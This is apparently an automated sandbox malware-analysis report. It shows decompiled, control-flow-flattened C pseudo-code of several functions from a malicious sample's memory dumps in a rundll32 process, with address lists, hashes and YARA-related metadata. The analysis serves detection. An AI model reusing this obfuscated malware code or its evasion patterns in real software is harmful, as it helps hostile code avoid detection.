						_t273 =  &_v1144; // 0x7d392b35
						_t343 = E02000D6D( *_t273, _v1072, _v1136, _t344);
						_t398 =  &(_t398[0xd]);
						_t349 = 0x1e34bac7;
					}
					__eflags =  *((intOrPtr*)( *0x2011088 + 0x244));
					if(__eflags == 0) {
						_t349 = 0x1c504520;
						goto L15;
					}
					_t349 = 0x35103033;
					continue;
					L15:
					__eflags = _t349 - 0xa5a6948;
				} while (__eflags != 0);
				return _t343;
			}

















































                                                                      0x01ffc364
                                                                      0x01ffc36a
                                                                      0x01ffc378
                                                                      0x01ffc383
                                                                      0x01ffc388
                                                                      0x01ffc391
                                                                      0x01ffc39c
                                                                      0x01ffc3a4
                                                                      0x01ffc3a9
                                                                      0x01ffc3b1
                                                                      0x01ffc3b9
                                                                      0x01ffc3c1
                                                                      0x01ffc3c9
                                                                      0x01ffc3d1
                                                                      0x01ffc3d9
                                                                      0x01ffc3e5
                                                                      0x01ffc3ea
                                                                      0x01ffc3f0
                                                                      0x01ffc3f8
                                                                      0x01ffc400
                                                                      0x01ffc40d
                                                                      0x01ffc410
                                                                      0x01ffc413
                                                                      0x01ffc417
                                                                      0x01ffc41f
                                                                      0x01ffc427
                                                                      0x01ffc42c
                                                                      0x01ffc434
                                                                      0x01ffc43c
                                                                      0x01ffc444
                                                                      0x01ffc44c
                                                                      0x01ffc451
                                                                      0x01ffc459
                                                                      0x01ffc461
                                                                      0x01ffc469
                                                                      0x01ffc471
                                                                      0x01ffc479
                                                                      0x01ffc481
                                                                      0x01ffc489
                                                                      0x01ffc491
                                                                      0x01ffc499
                                                                      0x01ffc4a9
                                                                      0x01ffc4ad
                                                                      0x01ffc4b5
                                                                      0x01ffc4bd
                                                                      0x01ffc4c5
                                                                      0x01ffc4d5
                                                                      0x01ffc4d9
                                                                      0x01ffc4e1
                                                                      0x01ffc4ec
                                                                      0x01ffc4f7
                                                                      0x01ffc502
                                                                      0x01ffc50e
                                                                      0x01ffc511
                                                                      0x01ffc515
                                                                      0x01ffc525
                                                                      0x01ffc52a
                                                                      0x01ffc52e
                                                                      0x01ffc536
                                                                      0x01ffc544
                                                                      0x01ffc549
                                                                      0x01ffc553
                                                                      0x01ffc558
                                                                      0x01ffc55c
                                                                      0x01ffc564
                                                                      0x01ffc56c
                                                                      0x01ffc57b
                                                                      0x01ffc57c
                                                                      0x01ffc580
                                                                      0x01ffc588
                                                                      0x01ffc590
                                                                      0x01ffc598
                                                                      0x01ffc5a0
                                                                      0x01ffc5a8
                                                                      0x01ffc5ad
                                                                      0x01ffc5b5
                                                                      0x01ffc5bd
                                                                      0x01ffc5c5
                                                                      0x01ffc5ca
                                                                      0x01ffc5ce
                                                                      0x01ffc5d6
                                                                      0x01ffc5de
                                                                      0x01ffc5e6
                                                                      0x01ffc5eb
                                                                      0x01ffc5f3
                                                                      0x01ffc5fb
                                                                      0x01ffc603
                                                                      0x01ffc60b
                                                                      0x01ffc613
                                                                      0x01ffc61b
                                                                      0x01ffc620
                                                                      0x01ffc628
                                                                      0x01ffc630
                                                                      0x01ffc638
                                                                      0x01ffc63d
                                                                      0x01ffc645
                                                                      0x01ffc64d
                                                                      0x01ffc65d
                                                                      0x01ffc661
                                                                      0x01ffc669
                                                                      0x01ffc671
                                                                      0x01ffc679
                                                                      0x01ffc681
                                                                      0x01ffc691
                                                                      0x01ffc695
                                                                      0x01ffc69d
                                                                      0x01ffc6a5
                                                                      0x01ffc6aa
                                                                      0x01ffc6b2
                                                                      0x01ffc6ba
                                                                      0x01ffc6c7
                                                                      0x01ffc6cb
                                                                      0x01ffc6d3
                                                                      0x01ffc6d7
                                                                      0x01ffc6d9
                                                                      0x01ffc6dd
                                                                      0x01ffc6e5
                                                                      0x01ffc6f2
                                                                      0x01ffc6fc
                                                                      0x01ffc709
                                                                      0x01ffc711
                                                                      0x01ffc719
                                                                      0x01ffc721
                                                                      0x01ffc726
                                                                      0x01ffc72e
                                                                      0x01ffc73b
                                                                      0x01ffc73f
                                                                      0x01ffc747
                                                                      0x01ffc74f
                                                                      0x01ffc757
                                                                      0x01ffc75c
                                                                      0x01ffc764
                                                                      0x01ffc76c
                                                                      0x01ffc774
                                                                      0x01ffc779
                                                                      0x01ffc781
                                                                      0x01ffc789
                                                                      0x01ffc789
                                                                      0x01ffc797
                                                                      0x01ffc8c1
                                                                      0x01ffc84f
                                                                      0x01ffc84f
                                                                      0x00000000
                                                                      0x01ffc84f
                                                                      0x01ffc7a3
                                                                      0x01ffc86a
                                                                      0x01ffc885
                                                                      0x01ffc88b
                                                                      0x01ffc8a7
                                                                      0x01ffc8ab
                                                                      0x01ffc8b0
                                                                      0x01ffc8b3
                                                                      0x00000000
                                                                      0x01ffc8b3
                                                                      0x01ffc7af
                                                                      0x01ffc900
                                                                      0x01ffc905
                                                                      0x01ffc907
                                                                      0x01ffc91a
                                                                      0x00000000
                                                                      0x01ffc923
                                                                      0x01ffc7b7
                                                                      0x01ffc84a
                                                                      0x00000000
                                                                      0x01ffc84a
                                                                      0x01ffc7bd
                                                                      0x01ffc7bf
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01ffc7c5
                                                                      0x01ffc7ca
                                                                      0x01ffc7ce
                                                                      0x01ffc818
                                                                      0x01ffc822
                                                                      0x01ffc829
                                                                      0x01ffc82d
                                                                      0x01ffc832
                                                                      0x01ffc835
                                                                      0x01ffc835
                                                                      0x01ffc8cd
                                                                      0x01ffc8d4
                                                                      0x01ffc8dd
                                                                      0x00000000
                                                                      0x01ffc8dd
                                                                      0x01ffc8d6
                                                                      0x00000000
                                                                      0x01ffc8df
                                                                      0x01ffc8df
                                                                      0x01ffc8df
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 1$5+9}$HiZ$LiE$f,$l$=6$tQ$wp
                                                                      • API String ID: 0-3332840876
                                                                      • Opcode ID: b7d9e9567344569d3939ab082d7f42fa7cef3e3ad5959f6f42f5cb2225e089f5
                                                                      • Instruction ID: ebe90bca9cc710302e9001ab42eaa772df6a64a345b2aca40567c9bba843bcaf
                                                                      • Opcode Fuzzy Hash: b7d9e9567344569d3939ab082d7f42fa7cef3e3ad5959f6f42f5cb2225e089f5
                                                                      • Instruction Fuzzy Hash: 42E121715093418FE368CF25C58995FBBF1BFC4B18F50891DF2AA862A0D7B58A09CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0023B8D8, Relevance: 10.3, Strings: 8, Instructions: 290COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 1$5+9}$HiZ$LiE$f,$l$=6$tQ$wp
                                                                      • API String ID: 0-3332840876
                                                                      • Opcode ID: 59573d73a54ce591e743191370aa59263fa98defaa15bace4ac305a490d770c9
                                                                      • Instruction ID: 6f42ad4cce4d10a7ba040388781e653accc68cef8a43abd395d3d6394f83d15a
                                                                      • Opcode Fuzzy Hash: 59573d73a54ce591e743191370aa59263fa98defaa15bace4ac305a490d770c9
                                                                      • Instruction Fuzzy Hash: 42E131B05193418FD368CF25C58995FBBF1BBC4B18F50891DF2AA862A0C7B5CA19CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0200DBC4, Relevance: 10.2, Strings: 8, Instructions: 247COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E0200DBC4(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				void* _t251;
				void* _t256;
				void* _t257;
				void* _t258;
				void* _t263;
				void* _t268;
				void* _t273;
				void* _t275;
				void* _t276;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				signed int _t281;
				intOrPtr _t296;
				void* _t297;
				signed int* _t299;
				void* _t306;

				_t299 =  &_v112;
				_v8 = 0x20016e;
				_t296 = 0;
				_t276 = __ecx;
				_v4 = 0;
				_t297 = 0x341554bf;
				_v52 = 0xc9b1;
				_v52 = _v52 | 0x2e528fe0;
				_t278 = 0xb;
				_v52 = _v52 * 0x55;
				_v52 = _v52 ^ 0x617f5ce2;
				_v100 = 0x134d;
				_v100 = _v100 | 0x49cd1c97;
				_v100 = _v100 << 0x10;
				_v100 = _v100 / _t278;
				_v100 = _v100 ^ 0x02e5e2d4;
				_v24 = 0xae5f;
				_t279 = 0x4b;
				_v24 = _v24 / _t279;
				_v24 = _v24 ^ 0x00004c4a;
				_v112 = 0xcc08;
				_v112 = _v112 << 6;
				_v112 = _v112 | 0x88c75b70;
				_t280 = 0x47;
				_v112 = _v112 * 0x55;
				_v112 = _v112 ^ 0x7a21016f;
				_v64 = 0x9f4b;
				_v64 = _v64 + 0x616b;
				_v64 = _v64 + 0xe20a;
				_v64 = _v64 ^ 0x0001dfd5;
				_v28 = 0x1fae;
				_v28 = _v28 / _t280;
				_v28 = _v28 ^ 0x00004ec5;
				_v104 = 0x5d77;
				_v104 = _v104 + 0x537;
				_v104 = _v104 ^ 0x96a0085a;
				_v104 = _v104 << 0xc;
				_v104 = _v104 ^ 0x06af5270;
				_v108 = 0xb68c;
				_v108 = _v108 + 0x2584;
				_v108 = _v108 * 0x34;
				_v108 = _v108 << 3;
				_v108 = _v108 ^ 0x016589aa;
				_v56 = 0x4faa;
				_v56 = _v56 + 0xffff23d2;
				_v56 = _v56 + 0xffff95f1;
				_v56 = _v56 ^ 0xffff6d68;
				_v60 = 0xec8;
				_v60 = _v60 ^ 0x81b41c80;
				_v60 = _v60 | 0x3699af79;
				_v60 = _v60 ^ 0xb7bdea19;
				_v68 = 0x17f7;
				_v68 = _v68 * 0x21;
				_v68 = _v68 << 2;
				_v68 = _v68 ^ 0x000c2d44;
				_v32 = 0xf9f5;
				_v32 = _v32 | 0xd49d42a3;
				_v32 = _v32 ^ 0xd49daf29;
				_v72 = 0xd36d;
				_v72 = _v72 + 0xffffdb20;
				_v72 = _v72 ^ 0x00009306;
				_v76 = 0x522c;
				_t281 = 0x43;
				_v76 = _v76 / _t281;
				_v76 = _v76 * 0x6a;
				_v76 = _v76 ^ 0x0000dde2;
				_v12 = 0x1c43;
				_v12 = _v12 ^ 0xefc0aea8;
				_v12 = _v12 ^ 0xefc08e31;
				_v48 = 0x803b;
				_v48 = _v48 ^ 0x188f99f3;
				_v48 = _v48 ^ 0x134b5df5;
				_v48 = _v48 ^ 0x0bc40f93;
				_v16 = 0xe843;
				_v16 = _v16 >> 2;
				_v16 = _v16 ^ 0x000063b5;
				_v92 = 0xef1;
				_v92 = _v92 + 0xffffaf3d;
				_v92 = _v92 + 0xec79;
				_v92 = _v92 * 0x5e;
				_v92 = _v92 ^ 0x003efb8a;
				_v20 = 0xa38a;
				_v20 = _v20 >> 2;
				_v20 = _v20 ^ 0x00006e81;
				_v96 = 0xdc33;
				_v96 = _v96 | 0xf1642443;
				_v96 = _v96 + 0xffffa62c;
				_v96 = _v96 >> 2;
				_v96 = _v96 ^ 0x3c59759f;
				_v36 = 0x935d;
				_v36 = _v36 ^ 0x8b551063;
				_v36 = _v36 ^ 0x8b558f98;
				_v80 = 0xa58;
				_v80 = _v80 >> 1;
				_v80 = _v80 >> 0xa;
				_v80 = _v80 ^ 0x00006691;
				_v84 = 0x2438;
				_v84 = _v84 | 0x4658edca;
				_v84 = _v84 >> 0x10;
				_v84 = _v84 ^ 0x01219229;
				_v84 = _v84 ^ 0x01218cc4;
				_v88 = 0x580e;
				_v88 = _v88 | 0xb8772654;
				_v88 = _v88 << 7;
				_v88 = _v88 | 0x5f1f4a93;
				_v88 = _v88 ^ 0x7fbf3adc;
				_v40 = 0xd338;
				_v40 = _v40 * 0x2d;
				_v40 = _v40 ^ 0xc6aa335d;
				_v40 = _v40 ^ 0xc68f75fb;
				_v44 = 0xf949;
				_v44 = _v44 << 0xd;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 ^ 0x0001c255;
				goto L1;
				do {
					while(1) {
						L1:
						_t306 = _t297 - 0x261de027;
						if(_t306 > 0) {
							break;
						}
						if(_t306 == 0) {
							_t258 = E02006B54(_t276, _v52, _v100);
							_t299 =  &(_t299[1]);
							_t297 = 0x13a0f061;
							_t296 = _t296 + _t258;
							continue;
						} else {
							if(_t297 == 0x71bdf61) {
								_t263 = E02002493();
								_t299 = _t299 - 0xc + 0xc;
								_t297 = 0x195a7642;
								_t296 = _t296 + _t263;
								continue;
							} else {
								if(_t297 == 0x13a0f061) {
									_t268 = E02002493();
									_t299 = _t299 - 0xc + 0xc;
									_t297 = 0x71bdf61;
									_t296 = _t296 + _t268;
									continue;
								} else {
									if(_t297 == 0x195a7642) {
										_t273 = E02002493();
										_t299 = _t299 - 0xc + 0xc;
										_t297 = 0x28ce47a5;
										_t296 = _t296 + _t273;
										continue;
									} else {
										if(_t297 == 0x24e4826b) {
											_t275 = E02006B54(_t276 + 0x20, _v36, _v80);
											_t299 =  &(_t299[1]);
											_t297 = 0x262fff8d;
											_t296 = _t296 + _t275;
											continue;
										}
									}
								}
							}
						}
						goto L20;
					}
					if(_t297 == 0x262fff8d) {
						_t251 = E02002493();
						_t299 = _t299 - 0xc + 0xc;
						_t297 = 0x558fb04;
						_t296 = _t296 + _t251;
					} else {
						if(_t297 == 0x28ce47a5) {
							_t256 = E02002493();
							_t299 = _t299 - 0xc + 0xc;
							_t297 = 0x2c38dfc0;
							_t296 = _t296 + _t256;
							goto L1;
						} else {
							if(_t297 == 0x2c38dfc0) {
								_t257 = E02006B54(_t276 + 0x18, _v20, _v96);
								_t299 =  &(_t299[1]);
								_t297 = 0x24e4826b;
								_t296 = _t296 + _t257;
								goto L1;
							} else {
								if(_t297 == 0x341554bf) {
									_t297 = 0x261de027;
									goto L1;
								}
							}
						}
					}
					L20:
				} while (_t297 != 0x558fb04);
				return _t296;
			}
















































                                                                      0x0200dbc4
                                                                      0x0200dbc7
                                                                      0x0200dbd5
                                                                      0x0200dbd7
                                                                      0x0200dbd9
                                                                      0x0200dbdd
                                                                      0x0200dbe2
                                                                      0x0200dbea
                                                                      0x0200dbf9
                                                                      0x0200dbfc
                                                                      0x0200dc00
                                                                      0x0200dc08
                                                                      0x0200dc10
                                                                      0x0200dc18
                                                                      0x0200dc25
                                                                      0x0200dc29
                                                                      0x0200dc31
                                                                      0x0200dc3d
                                                                      0x0200dc42
                                                                      0x0200dc48
                                                                      0x0200dc50
                                                                      0x0200dc58
                                                                      0x0200dc5d
                                                                      0x0200dc6a
                                                                      0x0200dc6b
                                                                      0x0200dc6f
                                                                      0x0200dc77
                                                                      0x0200dc7f
                                                                      0x0200dc87
                                                                      0x0200dc8f
                                                                      0x0200dc97
                                                                      0x0200dca5
                                                                      0x0200dca9
                                                                      0x0200dcb1
                                                                      0x0200dcb9
                                                                      0x0200dcc1
                                                                      0x0200dcc9
                                                                      0x0200dcce
                                                                      0x0200dcd6
                                                                      0x0200dcde
                                                                      0x0200dceb
                                                                      0x0200dcef
                                                                      0x0200dcf4
                                                                      0x0200dcfc
                                                                      0x0200dd04
                                                                      0x0200dd0c
                                                                      0x0200dd14
                                                                      0x0200dd1c
                                                                      0x0200dd24
                                                                      0x0200dd2c
                                                                      0x0200dd34
                                                                      0x0200dd3c
                                                                      0x0200dd49
                                                                      0x0200dd4d
                                                                      0x0200dd52
                                                                      0x0200dd5a
                                                                      0x0200dd62
                                                                      0x0200dd6a
                                                                      0x0200dd72
                                                                      0x0200dd82
                                                                      0x0200dd8a
                                                                      0x0200dd94
                                                                      0x0200dda7
                                                                      0x0200ddaa
                                                                      0x0200ddb3
                                                                      0x0200ddb7
                                                                      0x0200ddbf
                                                                      0x0200ddc7
                                                                      0x0200ddcf
                                                                      0x0200ddd7
                                                                      0x0200dddf
                                                                      0x0200dde7
                                                                      0x0200ddef
                                                                      0x0200ddf7
                                                                      0x0200ddff
                                                                      0x0200de04
                                                                      0x0200de0c
                                                                      0x0200de14
                                                                      0x0200de1c
                                                                      0x0200de29
                                                                      0x0200de2d
                                                                      0x0200de35
                                                                      0x0200de3d
                                                                      0x0200de42
                                                                      0x0200de4a
                                                                      0x0200de52
                                                                      0x0200de5a
                                                                      0x0200de62
                                                                      0x0200de67
                                                                      0x0200de6f
                                                                      0x0200de77
                                                                      0x0200de7f
                                                                      0x0200de87
                                                                      0x0200de8f
                                                                      0x0200de93
                                                                      0x0200de98
                                                                      0x0200dea0
                                                                      0x0200dea8
                                                                      0x0200deb0
                                                                      0x0200deb5
                                                                      0x0200debd
                                                                      0x0200dec5
                                                                      0x0200decd
                                                                      0x0200ded5
                                                                      0x0200deda
                                                                      0x0200dee2
                                                                      0x0200deea
                                                                      0x0200def7
                                                                      0x0200defb
                                                                      0x0200df03
                                                                      0x0200df0b
                                                                      0x0200df13
                                                                      0x0200df18
                                                                      0x0200df1d
                                                                      0x0200df1d
                                                                      0x0200df25
                                                                      0x0200df25
                                                                      0x0200df25
                                                                      0x0200df25
                                                                      0x0200df27
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0200df2d
                                                                      0x0200dff3
                                                                      0x0200dff8
                                                                      0x0200dffb
                                                                      0x0200e000
                                                                      0x00000000
                                                                      0x0200df33
                                                                      0x0200df39
                                                                      0x0200dfd5
                                                                      0x0200dfda
                                                                      0x0200dfdd
                                                                      0x0200dfe2
                                                                      0x00000000
                                                                      0x0200df3f
                                                                      0x0200df45
                                                                      0x0200dfae
                                                                      0x0200dfb3
                                                                      0x0200dfb6
                                                                      0x0200dfbb
                                                                      0x00000000
                                                                      0x0200df47
                                                                      0x0200df4d
                                                                      0x0200df8a
                                                                      0x0200df8f
                                                                      0x0200df92
                                                                      0x0200df97
                                                                      0x00000000
                                                                      0x0200df4f
                                                                      0x0200df55
                                                                      0x0200df66
                                                                      0x0200df6b
                                                                      0x0200df6e
                                                                      0x0200df73
                                                                      0x00000000
                                                                      0x0200df73
                                                                      0x0200df55
                                                                      0x0200df4d
                                                                      0x0200df45
                                                                      0x0200df39
                                                                      0x00000000
                                                                      0x0200df2d
                                                                      0x0200e00d
                                                                      0x0200e08a
                                                                      0x0200e08f
                                                                      0x0200e092
                                                                      0x0200e097
                                                                      0x0200e00f
                                                                      0x0200e015
                                                                      0x0200e063
                                                                      0x0200e068
                                                                      0x0200e06b
                                                                      0x0200e070
                                                                      0x00000000
                                                                      0x0200e017
                                                                      0x0200e01d
                                                                      0x0200e039
                                                                      0x0200e03e
                                                                      0x0200e041
                                                                      0x0200e046
                                                                      0x00000000
                                                                      0x0200e01f
                                                                      0x0200e025
                                                                      0x0200e027
                                                                      0x00000000
                                                                      0x0200e027
                                                                      0x0200e025
                                                                      0x0200e01d
                                                                      0x0200e015
                                                                      0x0200e099
                                                                      0x0200e099
                                                                      0x0200e0ae

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,R$8$$C$JL$X$ka$w]$y
                                                                      • API String ID: 0-1177348588
                                                                      • Opcode ID: 08c96f82fba47343827c7bed5efdf3b11118330523bd83467504f0b3eac7eb9d
                                                                      • Instruction ID: 7dab1d5d3686bd605641be18169aff993626340f857d2a77c38ab59a65f47eb6
                                                                      • Opcode Fuzzy Hash: 08c96f82fba47343827c7bed5efdf3b11118330523bd83467504f0b3eac7eb9d
                                                                      • Instruction Fuzzy Hash: 9FC111B29093808FE358DF24D58941BFBE1BBC4758F104A2DF596A62A0D7B4CA49CF47
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0024D138, Relevance: 10.2, Strings: 8, Instructions: 247COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,R$8$$C$JL$X$ka$w]$y
                                                                      • API String ID: 0-1177348588
                                                                      • Opcode ID: 08c96f82fba47343827c7bed5efdf3b11118330523bd83467504f0b3eac7eb9d
                                                                      • Instruction ID: a22e17d01b5c5d3b4944882eb385f95a74c37a67fc67e2b2c7c749900f6b86f9
                                                                      • Opcode Fuzzy Hash: 08c96f82fba47343827c7bed5efdf3b11118330523bd83467504f0b3eac7eb9d
                                                                      • Instruction Fuzzy Hash: D0C131B29093818FD358CF69D58A40BFBE0BBC5748F104A1DF596A6260D7B4DA18CF87
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FFE044, Relevance: 10.2, Strings: 8, Instructions: 237COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 99%
                                                                      			E01FFE044() {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _t217;
				signed int _t229;
				intOrPtr _t233;
				intOrPtr _t234;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				void* _t272;
				char _t276;
				signed int* _t277;
				void* _t279;

				_t277 =  &_v116;
				_v24 = 0x1c11a0;
				_t234 = 0;
				_v20 = 0;
				_v64 = 0x3d72;
				_v64 = _v64 << 2;
				_v64 = _v64 ^ 0x0000ca76;
				_v68 = 0xf5cd;
				_v68 = _v68 + 0xffff2303;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0x031a7530;
				_v96 = 0x9dde;
				_t236 = 0x63;
				_t272 = 0x178fbfee;
				_v96 = _v96 / _t236;
				_v96 = _v96 ^ 0xbe21e7a5;
				_v96 = _v96 | 0x0866bec9;
				_v96 = _v96 ^ 0xbe67b68d;
				_v100 = 0xb412;
				_v100 = _v100 | 0xcdc2e5f8;
				_v100 = _v100 + 0x255c;
				_v100 = _v100 ^ 0x3ca6a3af;
				_v100 = _v100 ^ 0xf165da8a;
				_v48 = 0xdf62;
				_v48 = _v48 << 0xc;
				_v48 = _v48 ^ 0x0df67e0a;
				_v88 = 0x25f4;
				_v88 = _v88 >> 2;
				_v88 = _v88 + 0xffff1fdf;
				_v88 = _v88 ^ 0xffff2442;
				_v60 = 0x15df;
				_v60 = _v60 / _t236;
				_v60 = _v60 ^ 0x00004288;
				_v80 = 0x3276;
				_v80 = _v80 + 0xffff6148;
				_v80 = _v80 >> 3;
				_v80 = _v80 ^ 0x1fffb761;
				_v84 = 0xd242;
				_t237 = 0x2a;
				_v84 = _v84 / _t237;
				_v84 = _v84 + 0x4474;
				_v84 = _v84 ^ 0x000073b3;
				_v56 = 0xcf32;
				_v56 = _v56 ^ 0x8ff9b71f;
				_v56 = _v56 ^ 0x8ff93793;
				_v116 = 0xfed9;
				_v116 = _v116 + 0xbfa2;
				_v116 = _v116 >> 0xa;
				_v116 = _v116 * 0x49;
				_v116 = _v116 ^ 0x00007060;
				_v104 = 0xd971;
				_v104 = _v104 >> 0xf;
				_v104 = _v104 << 4;
				_v104 = _v104 ^ 0xb0610f19;
				_v104 = _v104 ^ 0xb061137f;
				_v72 = 0x5818;
				_v72 = _v72 << 9;
				_v72 = _v72 + 0xc63d;
				_v72 = _v72 ^ 0x00b0f2f6;
				_v52 = 0x41b5;
				_v52 = _v52 ^ 0x7ab325a0;
				_v52 = _v52 ^ 0x7ab35b35;
				_v108 = 0x4ac4;
				_v108 = _v108 + 0xcc33;
				_t238 = 0x38;
				_v108 = _v108 / _t238;
				_v108 = _v108 | 0xd9acbeeb;
				_v108 = _v108 ^ 0xd9acd52b;
				_v112 = 0x4e86;
				_t239 = 0x47;
				_v112 = _v112 * 0x38;
				_v112 = _v112 >> 4;
				_v112 = _v112 << 6;
				_v112 = _v112 ^ 0x0044e3e3;
				_v76 = 0x72be;
				_v76 = _v76 << 5;
				_v76 = _v76 << 0xf;
				_v76 = _v76 ^ 0x2be030c0;
				_v40 = 0x48f5;
				_v40 = _v40 << 0xd;
				_v40 = _v40 ^ 0x091e8e4b;
				_v44 = 0x527b;
				_v44 = _v44 + 0xffff49c6;
				_v44 = _v44 ^ 0xffffdf12;
				_v92 = 0xbc66;
				_v92 = _v92 * 0x33;
				_v92 = _v92 / _t239;
				_t240 = 0x72;
				_v92 = _v92 / _t240;
				_v92 = _v92 ^ 0x0000393e;
				_t271 = _v36;
				_t276 = _v36;
				goto L1;
				do {
					while(1) {
						L1:
						_t279 = _t272 - 0x178fbfee;
						if(_t279 > 0) {
							break;
						}
						if(_t279 == 0) {
							_t272 = 0xe2793e3;
							continue;
						}
						if(_t272 == 0x47767b9) {
							E01FFDE81(_v112, _v32, _v76);
							_t272 = 0x28fbaa29;
							continue;
						}
						if(_t272 == 0x4d34f17) {
							_t229 = E01FFF5E0(_v80, _v84, _v56,  &_v16,  &_v32, _v116);
							_t277 =  &(_t277[4]);
							asm("sbb esi, esi");
							_t272 = ( ~_t229 & 0x361a5899) + 0x47767b9;
							continue;
						}
						if(_t272 == 0x55060ae) {
							_t272 = 0x28fbaa29;
							if(_v36 > 2) {
								_t233 = E02001090( *((intOrPtr*)(_t271 + 8)), _v88,  &_v28, _v60);
								_v32 = _t233;
								if(_t233 != 0) {
									_t272 = 0x4d34f17;
								}
							}
							continue;
						}
						if(_t272 != 0xe2793e3) {
							goto L21;
						} else {
							_t276 = E02000DC5();
							_t272 = 0x18910253;
							continue;
						}
					}
					if(_t272 == 0x18910253) {
						_t217 = E01FF74A7(_v68, _v96, _v100,  &_v36, _t276, _v48);
						_t271 = _t217;
						_t277 =  &(_t277[4]);
						if(_t217 == 0) {
							_t272 = 0x3b81234c;
							goto L21;
						}
						_t272 = 0x55060ae;
						goto L1;
					}
					if(_t272 == 0x28fbaa29) {
						E02001C64(_v40, _v44, _v92, _t271);
						L24:
						return _t234;
					}
					if(_t272 != 0x3a91c052) {
						goto L21;
					}
					_t185 =  &_v108; // 0x44e3e3
					E020021A5(_v104, _v72, _v12, _v8 + 1, _v52,  *0x2011088 + 0x38,  *_t185);
					_t277 =  &(_t277[5]);
					_t234 = 1;
					_t272 = 0x47767b9;
					 *((intOrPtr*)( *0x2011088 + 0xc)) = _v16;
					goto L1;
					L21:
				} while (_t272 != 0x3b81234c);
				goto L24;
			}












































                                                                      0x01ffe044
                                                                      0x01ffe047
                                                                      0x01ffe052
                                                                      0x01ffe054
                                                                      0x01ffe058
                                                                      0x01ffe060
                                                                      0x01ffe065
                                                                      0x01ffe06d
                                                                      0x01ffe075
                                                                      0x01ffe07d
                                                                      0x01ffe082
                                                                      0x01ffe08a
                                                                      0x01ffe09b
                                                                      0x01ffe0a0
                                                                      0x01ffe0a5
                                                                      0x01ffe0a9
                                                                      0x01ffe0b1
                                                                      0x01ffe0b9
                                                                      0x01ffe0c1
                                                                      0x01ffe0c9
                                                                      0x01ffe0d1
                                                                      0x01ffe0d9
                                                                      0x01ffe0e1
                                                                      0x01ffe0e9
                                                                      0x01ffe0f1
                                                                      0x01ffe0f6
                                                                      0x01ffe0fe
                                                                      0x01ffe106
                                                                      0x01ffe10b
                                                                      0x01ffe113
                                                                      0x01ffe11b
                                                                      0x01ffe12b
                                                                      0x01ffe131
                                                                      0x01ffe139
                                                                      0x01ffe141
                                                                      0x01ffe149
                                                                      0x01ffe14e
                                                                      0x01ffe156
                                                                      0x01ffe162
                                                                      0x01ffe165
                                                                      0x01ffe169
                                                                      0x01ffe171
                                                                      0x01ffe179
                                                                      0x01ffe181
                                                                      0x01ffe189
                                                                      0x01ffe191
                                                                      0x01ffe199
                                                                      0x01ffe1a1
                                                                      0x01ffe1ab
                                                                      0x01ffe1af
                                                                      0x01ffe1b7
                                                                      0x01ffe1bf
                                                                      0x01ffe1c4
                                                                      0x01ffe1c9
